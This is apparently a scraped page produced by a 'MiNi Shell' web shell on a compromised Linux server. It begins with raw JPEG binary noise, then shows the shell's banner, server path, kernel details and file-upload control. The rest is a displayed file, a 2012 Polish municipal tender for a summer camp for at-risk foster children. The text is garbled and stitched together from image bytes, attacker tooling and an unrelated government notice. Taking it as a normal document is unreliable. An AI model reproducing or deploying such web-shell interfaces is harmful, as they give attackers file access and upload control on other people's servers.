JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/244390-N-2012.html

<p class="kh_header"><b>Olsztyn: ZORGANIZOWANIE WYPOCZYNKU LETNIEGO W RAMACH PROGRAMU PROFILAKTYCZNO - WZMACNIAJACEGO DLA DZIECI ZAGROŻONYCH UZALEŻNIENIAMI, PRZEBYWAJĄCYCH W RODZINACH ZASTĘPCZYCH</b><br>
<b>Numer ogłoszenia: 244390 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , al. M. J. Piłsudskiego 61A, 10-449 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5340414, faks 089 5340538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.olsztyn.e-bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE WYPOCZYNKU LETNIEGO W RAMACH PROGRAMU PROFILAKTYCZNO - WZMACNIAJACEGO DLA DZIECI ZAGROŻONYCH UZALEŻNIENIAMI, PRZEBYWAJĄCYCH W RODZINACH ZASTĘPCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia w postępowaniu realizowanym w trybie przetargu nieograniczonego jest: zorganizowanie wypoczynku letniego w ramach Programu profilaktyczno -  wzmacniającego dla dzieci zagrożonych uzależnieniami, przebywających w rodzinach zastępczych. 
2.Uczestnikami wypoczynku będzie grupa 30 dzieci przebywających w rodzinach zastępczych w wieku 7-17 lat wskazanych przez Miejski Ośrodek Pomocy Społecznej w Olsztynie.
3. Wypoczynek 9-cio dniowy ma być zorganizowany w okolicach Zakopanego ( Murzasichle, Białka Tatrzańska)  w miesiącu sierpniu 2012r  (preferowany termin  04.08.2012- 12.08.2012r)

4.Wykonawca zapewni :

4.1.Obiekt:
4.1.1 Ośrodek, pensjonat usytuowany w niewielkiej odległości od Zakopanego (preferowane miejscowości Murzasichle, Białka Tatrzańska), w dobrym stanie technicznym, całoroczny, ogrzewany dysponujący pokojami 3-6 osobowymi z pełnym węzłem sanitarnym, stołówką, minimum 2 salami dydaktycznymi dla 10 osób, wyposażonymi w pomoce dydaktyczne: tablica standardowa sucho ścieralna, flipchart z zapasem kartek, w sprzęt audiowizualny  ( laptop, rzutnik , telewizor),  świetlicą z TV i wideo,
4.1.2 Obiekt musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami  o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska, zgodnie z  Rozporządzeniem Ministra Edukacji  Narodowej z dn. 9 grudnia 2009r w sprawie  warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci  młodzieży szkolnej,  a także zasad jego organizowania i  nadzorowania ( DZ.U  nr z 2009r Nr 218,  poz.1696.). 

 4.2. Zakwaterowanie:
4.2.1Zzakwaterowanie uczestników w pokojach 3 - 6 osobowych z pełnym węzłem sanitarnym.
4.2.2 Zakwaterowanie uczestników w jednym budynku przez cały czas trwania wypoczynku (8 noclegów).
4.2.3 Zabezpieczenie pościeli, 
Nie dopuszcza się możliwości zakwaterowania dzieci w namiotach, domkach kempingowych, budynkach szkolnych, internatach, bursach.

4.3. Wyżywienie :
4.3.1 Trzy posiłki dziennie: śniadanie, obiad dwudaniowy (zupa + drugie danie, surówki + napój), kolacja 
Posiłki muszą być urozmaicone, sycące, odpowiadające normom zarówno pod względem ilości, jakości oraz  wartości odżywczych.
4.3.2 Możliwość wieczornego dożywiania /min. chleb + masło i dżem/, całodobowy dostęp do napojów /herbata, woda z  sokiem/,
4.3.3 Suchy prowiant na drogę powrotną,
Posiłki będą przygotowane zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w Ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U.  2010 Nr 136, poz. 914 z późn. zm.);  
Podczas pobytu należy zapewnić 8 śniadań, 7 obiadów dwudaniowych, 1 obiadokolację, 7 kolacji .
(Pierwszy dzień zaczyna się obiadokolacją, ostatni dzień kończy się śniadaniem).
   
4.4. Opieka  pedagogiczna i medyczna : 
4.4.1 Zapewnienie całodobowej opieki przez minimum 3 opiekunów/wychowawców nad uczestnikami wypoczynku  którzy jednocześnie będą prowadzić zajęcia profilaktyczno - wzmacniające  posiadających wymagane uprawnienia, Rozporządzeniem Ministra Edukacji  Narodowej z dn. 9 grudnia 2009r w sprawie  warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci  młodzieży szkolnej,  a także zasad jego organizowania i  nadzorowania                      ( DZ.U  nr z 2009r Nr 218,  poz.1696.). 
4.4.2 Kierownik wypoczynku powinien mieć ukończony kurs dla kierowników placówek wypoczynku oraz co najmniej trzyletni staż pracy opiekuńczo-wychowawczej lub dydaktyczno wychowawczej, 
4.4.3 Zapewnienie przeprowadzenia zajęć profilaktyczno - wzmacniających dla uczestników wypoczynku
zajęcia w III grupach po 10 osób , zajęcia odbywać się będą przez 7 dni po 3 godz. według zakresu stanowiącego załącznik nr 5 do siwz.
4.4.4 Zapewnienie całodobowej opieki medycznej wraz z lekami pierwszej pomocy /lekarz na każde wezwanie/,
4.4.5 Zapewnienie izolatki dla dzieci chorych.

4.5. Program kulturalno -sportowy.
4.5.1 organizacja wycieczek z zapewnieniem opłacenia wszystkich biletów wstępu do zwiedzanych obiektów:
- do Zakopanego  (trwająca około 6 godz. w programie minimum zwiedzanie Muzeum Tatrzańskiego, wjazd na Gubałówkę, Aquapark 2 godz. pobytu)
- do Izby Regionalnej w Murzasichle (trwająca około 1,5 godzin umożliwiająca zapoznanie się uczestnikom wypoczynku ze zbiorami sztuki podhalańskiej, prelekcja na temat pierwszych osadników, muzyki i tańca regionalnego, zwyczajów pasterskich , zbójników, dowcipów itp.)
- do doliny Chochołowskiej (wyprawa trwająca około 6 godzin)
- do doliny Kościeliskiej (wyprawa trwająca około 5 godzin)
4.5.2.Organizacja  4 dyskotek , karaoke
4.5.3 Organizacja ogniska z pieczeniem kiełbasek,
4.5.4 Organizacja zajęć sportowych, wycieczek po okolicy
4.5.5.Wykorzystanie miejscowych i okolicznych form rekreacji.
4.5.6 Zapewnienie dostępu do sprzętu sportowo-rekreacyjnego: tj. piłek: futbolowych, do siatkówki, rakietek do badmintona, skakanek, gier świetlicowych /szachy, warcaby, inne gry planszowe, w miarę możliwości stół do tenisa stołowego z rakietkami, siatka z kompletem piłek/.

4.6 W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązuje się do:
4.6.1.Zapewnienia transportu uczestnikom wypoczynku z Olsztyna do miejsca zakwaterowania  /PKP/ z dworca PKP na miejsce zakwaterowania przejazd autokarem ( przejazd w ciągu dnia); zapewnienia transportu  z miejsca wypoczynku do Olsztyna /PKP/ z miejsca zakwaterowania  na dworzec PKP przejazd autokarem  (przejazd w ciągu dnia )
Zbiórka dzieci przed wyjazdem na wypoczynek przewidziana jest na dworcu PKP w Olsztynie na 40 min przed planowanym odjazdem pociągu. Odbiór dzieci z wypoczynku na dworcu PKP w Olsztynie przez opiekuna lub powrót samodzielny na podstawie zgody opiekuna dostarczonej organizatorowi przez wyjazdem na wypoczynek. 

4.6.2 Zapewnienia opieki podczas pobytu i podróży w obie strony;
4.6.3 Przeprowadzenia zajęć profilaktyczno - wzmacniających dla uczestników wypoczynku wg załącznika nr 5 do siwz
4.6.4 Przygotowania  sprawozdania  z wypoczynku  w ramach Programu profilaktyczno wzmacniającego dla dzieci zagrożonych uzależnieniami, przebywających w rodzinach zastępczych i dostarczenie go nie później niż w dniu wystawienia faktury za zorganizowanie wypoczynku. 
4.6.5 Zapewnienie ubezpieczenia każdego z uczestników wypoczynku letniego na okres ich transportu, wycieczek oraz na czas trwania wypoczynku. 
-Pakiet ubezpieczenia NNW na wypadek śmierci oraz 100% uszczerbku na zdrowiu  20.000zł. 
-Zakres ochrony z włączeniem ryzyka zawału serca i udaru mózgu. Zakres ubezpieczenia: RP.

Wykonawcy są zobowiązani do starannego zapoznania się z przedmiotem zamówienia, wszystkimi czynnikami mającymi wpływ na kształtowanie  się cen ofertowych oraz  warunkami wykonania zamówienia 
Wykaz dzieci zakwalifikowanych do wypoczynku letniego przekazany będzie Wykonawcy na 2 dni przed wyjazdem na wypoczynek. 

Zakres zajęć profilaktyczno - wzmacniających dla uczestników wypoczynku  znajduje się w załączniku na 5 od SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.41.00-1, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego:
1.Oświadczenia o spełnianiu warunków określonych w art.22 ust.1. oraz 
2.zaświadczenia o wpisie do rejestru organizatorów turystyki i pośredników turystycznych prowadzonego przez marszałka województwa właściwego ze względu na siedzibę przedsiębiorcy. W przypadku przedsiębiorcy zagranicznego - wybrany przez niego marszałek województwa, z zastrzeżeniem, iż w przypadku przedsiębiorcy zagranicznego, który utworzył oddział na terytorium Rzeczypospolitej Polskiej zgodnie z przepisami ustawy dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2007 r. Nr 155, poz. 1095, ze zm.), organem właściwym do prowadzenia rejestru jest marszałek województwa ze względu na siedzibę oddziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego:
1.Oświadczenia o spełnianiu warunków określonych w art.22 ust.1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Oświadczenia o spełnianiu warunków określonych w art.22 ust.1. oraz
wykaże, że posiada, lub przedstawi pisemne zobowiązanie innego podmiotu, że dysponuje odpowiednia bazą noclegową do wykonania zamówienia tj.
ośrodkiem, pensjonatem usytuowanym w niewielkiej odległości od Zakopanego (preferowane miejscowości: Murzasichle, Białka Tatrzańska), całoroczny, ogrzewany, kwatery z pokojami 3-6 osobowymi z pełnym węzłem sanitarnym zabezpieczenie pościeli, stołówka, posiadający min 2 sale dydaktyczne dla 10 osób, wyposażona w pomoce dydaktyczne minimum tablica standardowa sucho ścieralna, flipchart z zapasem kartek, w sprzęt audiowizualny ( laptop, rzutnik, telewizor) świetlicę z  TV i wideo. Obiekt musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami  o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska, zgodnie z  Rozporządzeniem Ministra Edukacji  Narodowej z dn. 9 grudnia 2009r w sprawie  warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci  młodzieży szkolnej,  a także zasad jego organizowania i  nadzorowania ( DZ.U  nr z 2009r Nr 218,  poz.1696.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego:
1.Oświadczenia o spełnianiu warunków określonych w art.22 ust.1.
2.Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie:
1.Oświadczenia o spełnianiu warunków określonych w art.22 ust.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty.
2.Pełnomocnictwo/pełnomocnictwa - jeżeli dotyczy. Złożone w formie oryginału lub kopii poświadczonej przez notariusza, ustanawiające osobę/osoby do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia: 
-dopuszcza się zmniejszenie ilości osób uczestniczących w wypoczynku w stosunku do liczby podanej w ogłoszeniu i SIWZ w zależności od liczby chętnych osób nie więcej jednak niż 3 osoby, w takim przypadku Zamawiający zapłaci Wykonawcy wynagrodzenie za faktyczną liczbę osób uczestniczących w wypoczynku,
2.Zamawiajacy dopuszcza zmianę kadry opiekunów/wychowawców z zastrzeżeniem, iż przed wystąpieniem takiej sytuacji Wykonawca poinformuje Zamawiającego a wskazane osoby będą miały uprawnienia, doświadczenie i wiedzę  w stopniu nie niższym niż osoby zaproponowane przez Wykonawcę.
3.Zamawiający dopuszcza zmianę miejsca wypoczynku z zastrzeżeniem, iż przed wystąpieniem takiej sytuacji Wykonawca poinformuje Zamawiającego a zaproponowane przez Wykonawcę miejsce będzie o standardzie nie gorszym niż zaproponowane przez Wykonawcę w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.olsztyn.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek  Pomocy Społecznej, al. M.J.Piłsudskiego 61A
10-449 Olsztyn p III pok. 314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2012 godzina 10:00, miejsce: Miejski Ośrodek  Pomocy Społecznej, al. M.J.Piłsudskiego 61A
10-449 Olsztyn p. III pok. 317 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com